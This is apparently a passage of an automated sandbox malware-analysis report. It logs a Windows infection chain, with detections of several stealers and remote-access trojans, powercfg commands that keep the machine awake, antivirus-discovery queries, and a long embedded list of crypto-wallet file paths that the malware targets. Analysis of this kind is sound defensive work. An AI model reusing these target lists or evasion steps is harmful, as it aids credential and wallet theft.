Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C66A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6C66A8DC

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C5B8390 NSS_GetVersion,

0_2_6C5B8390

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

Source: 60c1233683.exe, 00000022.00000003.2877082401.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000002.2958937922.0000000000D23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 60c1233683.exe, 00000022.00000002.2963578166.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2904209144.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 9.2.DBFIEHDHII.exe.d40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.skotes.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.skotes.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.skotes.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2957628244.0000000000DD1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2182584955.0000000000DD1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2188220739.0000000000DD1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2153817470.0000000000D41000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Yara detected DCRat

Source: Yara match	File source: 16.2.wTMEVe8.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.wVBhC3KCkV.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wTMEVe8.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wTMEVe8.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.2958021104.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2454433505.00000000007F2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2958021104.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2455002578.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wTMEVe8.exe PID: 1836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wVBhC3KCkV.exe PID: 3684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe PID: 3060, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Package Cache\SystemSettings.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe, type: DROPPED

Yara detected DarkVision Rat

Source: Yara match	File source: 28.2.powershell.exe.60b0328.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.60324f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.downloaded_file.exe.11fffa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.explorer.exe.2dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.0.downloaded_file.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.downloaded_file.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.60324f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.60b0328.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.2763632421.0000000001200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2956530663.0000000002E08000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2768909710.0000000000902000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2807680074.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.2762140149.0000000000902000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2770761069.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: downloaded_file.exe PID: 7708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 60c1233683.exe PID: 8128, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000023.00000002.2874624996.00000000003E1000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2780250709.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2113309307.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114430584.000000000176E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1668555153.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 50c9f14fb7.exe PID: 7704, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7396, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local 